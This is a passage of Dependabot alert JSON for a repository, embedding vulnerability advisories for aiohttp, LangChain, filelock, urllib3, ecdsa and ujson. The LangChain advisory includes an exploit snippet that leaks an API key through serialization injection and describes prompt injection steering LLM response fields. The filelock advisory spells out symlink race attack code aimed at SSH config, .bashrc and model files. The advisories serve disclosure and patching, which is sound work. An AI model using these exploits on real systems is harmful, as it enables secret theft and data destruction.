https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a","severity":"high","identifiers":[{"value":"GHSA-6mq8-rvhq-8wgg","type":"GHSA"},{"value":"CVE-2025-69223","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-6mq8-rvhq-8wgg"},{"url":"https://github.com/aio-libs/aiohttp/commit/2b920c39002cee0ec5b402581779bbaaf7c9138a"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-69223"},{"url":"https://github.com/advisories/GHSA-6mq8-rvhq-8wgg"}],"published_at":"2026-01-05T22:58:41Z","updated_at":"2026-01-06T16:06:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"high","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00082,"percentile":0.23714},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"},{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"high","vulnerable_version_range":"<= 3.13.2","first_patched_version":{"identifier":"3.13.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/70","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/70","created_at":"2026-05-13T05:27:12Z","updated_at":"2026-05-13T05:27:12Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":69,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-c67j-w6g6-q2cm","cve_id":"CVE-2025-68664","summary":"LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs","description":"## Summary\n\nA serialization injection vulnerability exists in LangChain's `dumps()` and `dumpd()` functions. The functions do not escape dictionaries with `'lc'` keys when serializing free-form dictionaries. The `'lc'` key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.\n\n### Attack surface\n\nThe core vulnerability was in `dumps()` and `dumpd()`: these functions failed to escape user-controlled dictionaries containing `'lc'` keys. When this unescaped data was later deserialized via `load()` or `loads()`, the injected structures were treated as legitimate LangChain objects rather than plain user data.\n\nThis escaping bug enabled several attack vectors:\n\n1. **Injection via user data**: Malicious LangChain object structures could be injected through user-controlled fields like `metadata`, `additional_kwargs`, or `response_metadata`\n2. **Class instantiation within trusted namespaces**: Injected manifests could instantiate any `Serializable` subclass, but only within the pre-approved trusted namespaces (`langchain_core`, `langchain`, `langchain_community`). This includes classes with side effects in `__init__` (network calls, file operations, etc.). Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.\n\n### Security hardening\n\nThis patch fixes the escaping bug in `dumps()` and `dumpd()` and introduces new restrictive defaults in `load()` and `loads()`: allowlist enforcement via `allowed_objects=\"core\"` (restricted to [serialization mappings](https://github.com/langchain-ai/langchain/blob/master/libs/core/langchain_core/load/mapping.py)), `secrets_from_env` changed from `True` to `False`, and default Jinja2 template blocking via `init_validator`. These are breaking changes for some use cases.\n\n## Who is affected?\n\nApplications are vulnerable if they:\n\n1. **Use `astream_events(version=\"v1\")`** — The v1 implementation internally uses vulnerable serialization. Note: `astream_events(version=\"v2\")` is not vulnerable.\n2. **Use `Runnable.astream_log()`** — This method internally uses vulnerable serialization for streaming outputs.\n3. **Call `dumps()` or `dumpd()` on untrusted data, then deserialize with `load()` or `loads()`** — Trusting your own serialization output makes you vulnerable if user-controlled data (e.g., from LLM responses, metadata fields, or user inputs) contains `'lc'` key structures.\n4. **Deserialize untrusted data with `load()` or `loads()`** — Directly deserializing untrusted data that may contain injected `'lc'` structures.\n5. **Use `RunnableWithMessageHistory`** — Internal serialization in message history handling.\n6. **Use `InMemoryVectorStore.load()`** to deserialize untrusted documents.\n7. Load untrusted generations from cache using **`langchain-community` caches**.\n8. Load untrusted manifests from the LangChain Hub via **`hub.pull`**.\n9. Use **`StringRunEvaluatorChain`** on untrusted runs.\n10. Use **`create_lc_store`** or **`create_kv_docstore`** with untrusted documents.\n11. Use **`MultiVectorRetriever`** with byte stores containing untrusted documents.\n12. Use **`LangSmithRunChatLoader`** with runs containing untrusted messages.\n\nThe most common attack vector is through **LLM response fields** like `additional_kwargs` or `response_metadata`, which can be controlled via prompt injection and then serialized/deserialized in streaming operations.\n\n## Impact\n\nAttackers who control serialized data can extract environment variable secrets by injecting `{\"lc\": 1, \"type\": \"secret\", \"id\": [\"ENV_VAR\"]}` to load environment variables during deserialization (when `secrets_from_env=True`, which was the old default). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within trusted namespaces with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.\n\nKey severity factors:\n\n- Affects the serialization path - applications trusting their own serialization output are vulnerable\n- Enables secret extraction when combined with `secrets_from_env=True` (the old default)\n- LLM responses in `additional_kwargs` can be controlled via prompt injection\n\n## Exploit example\n\n```python\nfrom langchain_core.load import dumps, load\nimport os\n\n# Attacker injects secret structure into user-controlled data\nattacker_dict = {\n \"user_data\": {\n \"lc\": 1,\n \"type\": \"secret\",\n \"id\": [\"OPENAI_API_KEY\"]\n }\n}\n\nserialized = dumps(attacker_dict) # Bug: does NOT escape the 'lc' key\n\nos.environ[\"OPENAI_API_KEY\"] = \"sk-secret-key-12345\"\ndeserialized = load(serialized, secrets_from_env=True)\n\nprint(deserialized[\"user_data\"]) # \"sk-secret-key-12345\" - SECRET LEAKED!\n\n```\n\n## Security hardening changes (breaking changes)\n\nThis patch introduces three breaking changes to `load()` and `loads()`:\n\n1. **New `allowed_objects` parameter** (defaults to `'core'`): Enforces allowlist of classes that can be deserialized. The `'all'` option corresponds to the list of objects [specified in `mappings.py`](https://github.com/langchain-ai/langchain/blob/master/libs/core/langchain_core/load/mapping.py) while the `'core'` option limits to objects within `langchain_core`. We recommend that users explicitly specify which objects they want to allow for serialization/deserialization.\n2. **`secrets_from_env` default changed from `True` to `False`**: Disables automatic secret loading from environment\n3. **New `init_validator` parameter** (defaults to `default_init_validator`): Blocks Jinja2 templates by default\n\n## Migration guide\n\n### No changes needed for most users\n\nIf you're deserializing standard LangChain types (messages, documents, prompts, trusted partner integrations like `ChatOpenAI`, `ChatAnthropic`, etc.), your code will work without changes:\n\n```python\nfrom langchain_core.load import load\n\n# Uses default allowlist from serialization mappings\nobj = load(serialized_data)\n\n```\n\n### For custom classes\n\nIf you're deserializing custom classes not in the serialization mappings, add them to the allowlist:\n\n```python\nfrom langchain_core.load import load\nfrom my_package import MyCustomClass\n\n# Specify the classes you need\nobj = load(serialized_data, allowed_objects=[MyCustomClass])\n```\n\n### For Jinja2 templates\n\nJinja2 templates are now blocked by default because they can execute arbitrary code. If you need Jinja2 templates, pass `init_validator=None`:\n\n```python\nfrom langchain_core.load import load\nfrom langchain_core.prompts import PromptTemplate\n\nobj = load(\n serialized_data,\n allowed_objects=[PromptTemplate],\n init_validator=None\n)\n\n```\n\n> [!WARNING]\n> Only disable `init_validator` if you trust the serialized data. Jinja2 templates can execute arbitrary Python code.\n\n### For secrets from environment\n\n`secrets_from_env` now defaults to `False`. If you need to load secrets from environment variables:\n\n```python\nfrom langchain_core.load import load\n\nobj = load(serialized_data, secrets_from_env=True)\n```\n\n\n## Credits\n\n* Dumps bug was reported by @yardenporat\n* Changes for security hardening due to findings from @0xn3va and @VladimirEliTokarev","severity":"critical","identifiers":[{"value":"GHSA-c67j-w6g6-q2cm","type":"GHSA"},{"value":"CVE-2025-68664","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-c67j-w6g6-q2cm"},{"url":"https://github.com/langchain-ai/langchain/pull/34455"},{"url":"https://github.com/langchain-ai/langchain/pull/34458"},{"url":"https://github.com/langchain-ai/langchain/commit/5ec0fa69de31bbe3d76e4cf9cd65a6accb8466c8"},{"url":"https://github.com/langchain-ai/langchain/commit/d9ec4c5cc78960abd37da79b0250f5642e6f0ce6"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.81"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68664"},{"url":"https://github.com/advisories/GHSA-c67j-w6g6-q2cm"}],"published_at":"2025-12-23T18:46:13Z","updated_at":"2025-12-24T01:08:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":">= 1.0.0, < 1.2.5","first_patched_version":{"identifier":"1.2.5"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":"< 0.3.81","first_patched_version":{"identifier":"0.3.81"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N","score":9.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.02264,"percentile":0.84694},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N","score":9.3},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"critical","vulnerable_version_range":">= 1.0.0, < 1.2.5","first_patched_version":{"identifier":"1.2.5"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/69","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/69","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":68,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"filelock"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-w853-jp5j-5j7f","cve_id":"CVE-2025-68146","summary":"filelock has a TOCTOU race condition which allows symlink attacks during lock file creation","description":"### Impact\n\nA Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file.\n\n**Who is impacted:**\n\nAll users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries:\n\n- **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths\n- **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures\n- **poetry/tox users**: through using virtualenv or filelock on their own.\n\nAttack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable.\n\n### Patches\n\nFixed in version **3.20.1**.\n\n**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\\_acquire() to prevent symlink following.\n\n**Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\\_acquire().\n\n**Users should upgrade to filelock 3.20.1 or later immediately.**\n\n### Workarounds\n\nIf immediate upgrade is not possible:\n\n1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases)\n2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks\n3. Monitor lock file directories for suspicious symlinks before running trusted applications\n\n**Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended.\n\n______________________________________________________________________\n\n## Technical Details: How the Exploit Works\n\n### The Vulnerable Code Pattern\n\n**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):\n\n```python\ndef _acquire(self) -> None:\n ensure_directory_exists(self.lock_file)\n open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate\n if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist?\n open_flags |= os.O_CREAT\n fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate\n```\n\n**Windows** (`src/filelock/_windows.py:19-28`):\n\n```python\ndef _acquire(self) -> None:\n raise_on_not_writable_file(self.lock_file) # (1) Check writability\n ensure_directory_exists(self.lock_file)\n flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate\n fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate\n```\n\n### The Race Window\n\nThe vulnerability exists in the gap between operations:\n\n**Unix variant:**\n\n```\nTime Victim Thread Attacker Thread\n---- ------------- ---------------\nT0 Check: lock_file exists? → False\nT1 ↓ RACE WINDOW\nT2 Create symlink: lock → victim_file\nT3 Open lock_file with O_TRUNC\n → Follows symlink\n → Opens victim_file\n → Truncates victim_file to 0 bytes! ☠️\n```\n\n**Windows variant:**\n\n```\nTime Victim Thread Attacker Thread\n---- ------------- ---------------\nT0 Check: lock_file writable?\nT1 ↓ RACE WINDOW\nT2 Create symlink: lock → victim_file\nT3 Open lock_file with O_TRUNC\n → Follows symlink/junction\n → Opens victim_file\n → Truncates victim_file to 0 bytes! ☠️\n```\n\n### Step-by-Step Attack Flow\n\n**1. Attacker Setup:**\n\n```python\n# Attacker identifies target application using filelock\nlock_path = \"/tmp/myapp.lock\" # Predictable lock path\nvictim_file = \"/home/victim/.ssh/config\" # High-value target\n```\n\n**2. Attacker Creates Race Condition:**\n\n```python\nimport os\nimport threading\n\n\ndef attacker_thread():\n # Remove any existing lock file\n try:\n os.unlink(lock_path)\n except FileNotFoundError:\n pass\n\n # Create symlink pointing to victim file\n os.symlink(victim_file, lock_path)\n print(f\"[Attacker] Created: {lock_path} → {victim_file}\")\n\n\n# Launch attack\nthreading.Thread(target=attacker_thread).start()\n```\n\n**3. Victim Application Runs:**\n\n```python\nfrom filelock import UnixFileLock\n\n# Normal application code\nlock = UnixFileLock(\"/tmp/myapp.lock\")\nlock.acquire() # ← VULNERABILITY TRIGGERED HERE\n# At this point, /home/victim/.ssh/config is now 0 bytes!\n```\n\n**4. What Happens Inside os.open():**\n\nOn Unix systems, when `os.open()` is called:\n\n```c\n// Linux kernel behavior (simplified)\nint open(const char *pathname, int flags) {\n struct file *f = path_lookup(pathname); // Resolves symlinks by default!\n\n if (flags & O_TRUNC) {\n truncate_file(f); // ← Truncates the TARGET of the symlink\n }\n\n return file_descriptor;\n}\n```\n\nWithout `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file.\n\n### Why the Attack Succeeds Reliably\n\n**Timing Characteristics:**\n\n- **Check operation** (Path.exists()): ~100-500 nanoseconds\n- **Symlink creation** (os.symlink()): ~1-10 microseconds\n- **Race window**: ~1-5 microseconds (very small but exploitable)\n- **Thread scheduling quantum**: ~1-10 milliseconds\n\n**Success factors:**\n\n1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts\n2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations\n3. **No synchronization**: No atomic file creation prevents the race\n4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation)\n\n### Real-World Attack Scenarios\n\n**Scenario 1: virtualenv Exploitation**\n\n```python\n# Victim runs: python -m venv /tmp/myenv\n# Attacker racing to create:\nos.symlink(\"/home/victim/.bashrc\", \"/tmp/myenv/pyvenv.cfg\")\n\n# Result: /home/victim/.bashrc overwritten with:\n# home = /usr/bin/python3\n# include-system-site-packages = false\n# version = 3.11.2\n# ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker\n```\n\n**Scenario 2: PyTorch Cache Poisoning**\n\n```python\n# Victim runs: import torch\n# PyTorch checks CPU capabilities, uses filelock on cache\n# Attacker racing to create:\nos.symlink(\"/home/victim/.torch/compiled_model.pt\", \"/home/victim/.cache/torch/cpu_isa_check.lock\")\n\n# Result: Trained ML model checkpoint truncated to 0 bytes\n# Impact: Weeks of training lost, ML pipeline DoS\n```\n\n### Why Standard Defenses Don't Help\n\n**File permissions don't prevent this:**\n\n- Attacker doesn't need write access to victim_file\n- os.open() with O_TRUNC follows symlinks using the *victim's* permissions\n- The victim process truncates its own file\n\n**Directory permissions help but aren't always feasible:**\n\n- Lock files often created in shared /tmp directory (mode 1777)\n- Applications may not control lock file location\n- Many apps use predictable paths in user-writable directories\n\n**File locking doesn't prevent this:**\n\n- The truncation happens *during* the open() call, before any lock is acquired\n- fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks\n\n### Exploitation Proof-of-Concept Results\n\nFrom empirical testing with the provided PoCs:\n\n**Simple Direct Attack** (`filelock_simple_poc.py`):\n\n- Success rate: 33% per attempt (1 in 3 tries)\n- Average attempts to success: 2.1\n- Target file reduced to 0 bytes in \\<100ms\n\n**virtualenv Attack** (`weaponized_virtualenv.py`):\n\n- Success rate: ~90% on first attempt (deterministic timing)\n- Information leaked: File paths, Python version, system configuration\n- Data corruption: Complete loss of original file contents\n\n**PyTorch Attack** (`weaponized_pytorch.py`):\n\n- Success rate: 25-40% per attempt\n- Impact: Application crashes, model loading failures\n- Recovery: Requires cache rebuild or model retraining\n\n**Discovered and reported by:** George Tsigourakos (@tsigouris007)","severity":"medium","identifiers":[{"value":"GHSA-w853-jp5j-5j7f","type":"GHSA"},{"value":"CVE-2025-68146","type":"CVE"}],"references":[{"url":"https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f"},{"url":"https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e"},{"url":"https://github.com/tox-dev/filelock/releases/tag/3.20.1"},{"url":"https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants"},{"url":"https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html"},{"url":"https://github.com/advisories/GHSA-w853-jp5j-5j7f"}],"published_at":"2025-12-16T20:52:55Z","updated_at":"2025-12-16T20:52:56Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.1","first_patched_version":{"identifier":"3.20.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H","score":6.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":4.0e-05,"percentile":0.00136},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H","score":6.3},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-362","name":"Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')"},{"cwe_id":"CWE-367","name":"Time-of-check Time-of-use (TOCTOU) Race Condition"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"filelock"},"severity":"medium","vulnerable_version_range":"< 3.20.1","first_patched_version":{"identifier":"3.20.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/68","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/68","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":67,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-2xpw-w6gg-jr37","cve_id":"CVE-2025-66471","summary":"urllib3 streaming API improperly handles highly compressed data","description":"### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nWhen streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation.\n\nThe decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources.\n\n`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`, `readinto(b)` are examples of `urllib3.HTTPResponse` method calls using the affected logic unless decoding is disabled explicitly.\n\n\n### Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount.\n\nIf your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the `urllib3[brotli]` extra in the patched versions of urllib3.\n\n\n### Credits\n\nThe issue was reported by @Cycloctane.\nSupplemental information was provided by @stamparm during a security audit performed by [7ASecurity](https://7asecurity.com/) and facilitated by [OSTIF](https://ostif.org/).","severity":"high","identifiers":[{"value":"GHSA-2xpw-w6gg-jr37","type":"GHSA"},{"value":"CVE-2025-66471","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37"},{"url":"https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66471"},{"url":"https://github.com/advisories/GHSA-2xpw-w6gg-jr37"}],"published_at":"2025-12-05T18:15:54Z","updated_at":"2025-12-05T18:33:09Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.0, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00014,"percentile":0.02784},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-409","name":"Improper Handling of Highly Compressed Data (Data Amplification)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.0, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/67","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/67","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":66,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"urllib3"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-gm62-xv2j-4w53","cve_id":"CVE-2025-66418","summary":"urllib3 allows an unbounded number of links in the decompression chain","description":"## Impact\n\nurllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).\n\nHowever, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data.\n\n\n## Affected usages\n\nApplications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly.\n\n\n## Remediation\n\nUpgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5.\n\nIf upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers[\"content-encoding\"]` contains a safe number of encodings before reading the response content.","severity":"high","identifiers":[{"value":"GHSA-gm62-xv2j-4w53","type":"GHSA"},{"value":"CVE-2025-66418","type":"CVE"}],"references":[{"url":"https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53"},{"url":"https://github.com/urllib3/urllib3/commit/24d7b67eac89f94e11003424bcf0d8f7b72222a8"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66418"},{"url":"https://github.com/advisories/GHSA-gm62-xv2j-4w53"}],"published_at":"2025-12-05T18:15:19Z","updated_at":"2025-12-05T18:33:00Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.24, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H","score":8.9}},"epss":{"percentage":0.00016,"percentile":0.03574},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"urllib3"},"severity":"high","vulnerable_version_range":">= 1.24, < 2.6.0","first_patched_version":{"identifier":"2.6.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/66","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/66","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":65,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ecdsa"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-wj6h-64fc-37mp","cve_id":"CVE-2024-23342","summary":"Minerva timing attack on P-256 in python-ecdsa","description":"python-ecdsa has been found to be subject to a Minerva timing attack on the P-256 curve. Using the `ecdsa.SigningKey.sign_digest()` API function and timing signatures an attacker can leak the internal nonce which may allow for private key discovery. Both ECDSA signatures, key generation, and ECDH operations are affected. ECDSA signature verification is unaffected. The python-ecdsa project considers side channel attacks out of scope for the project and there is no planned fix.","severity":"high","identifiers":[{"value":"GHSA-wj6h-64fc-37mp","type":"GHSA"},{"value":"CVE-2024-23342","type":"CVE"}],"references":[{"url":"https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-wj6h-64fc-37mp"},{"url":"https://github.com/tlsfuzzer/python-ecdsa/blob/master/SECURITY.md"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23342"},{"url":"https://minerva.crocs.fi.muni.cz"},{"url":"https://securitypitfalls.wordpress.com/2018/08/03/constant-time-compare-in-python"},{"url":"https://github.com/advisories/GHSA-wj6h-64fc-37mp"}],"published_at":"2024-01-22T21:35:27Z","updated_at":"2025-07-30T18:17:41Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"high","vulnerable_version_range":">= 0","first_patched_version":null}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","score":7.4},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00622,"percentile":0.69689},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","score":7.4},"cwes":[{"cwe_id":"CWE-203","name":"Observable Discrepancy"},{"cwe_id":"CWE-208","name":"Observable Timing Discrepancy"},{"cwe_id":"CWE-385","name":"Covert Timing Channel"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ecdsa"},"severity":"high","vulnerable_version_range":">= 0","first_patched_version":null},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/65","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/65","created_at":"2026-05-13T05:27:11Z","updated_at":"2026-05-13T05:27:11Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":64,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"unknown"},"security_advisory":{"ghsa_id":"GHSA-c38f-wx89-p2xg","cve_id":"CVE-2026-44660","summary":"UltraJSON has a Memory Leak in ujson.dump() on Write Failure","description":"### Summary\n\nWhen `ujson.dump()` writes to a file-like object and the write operation raises an exception, the serialized JSON string object is not decremented, leaking memory. Each failed write operation leaks the full size of the serialized payload.\n\nCode that uses `ujson.dumps()` rather than `ujson.dump()` or only JSON load/decode methods is unaffected.\n\n### Details\n\n**Vulnerability Location:**\n- `src/ujson/python/objToJSON.c:913` - `objToJSONFile()` function start\n- `src/ujson/python/objToJSON.c:931` - Error return on write failure\n- `src/ujson/python/objToJSON.c:942` - 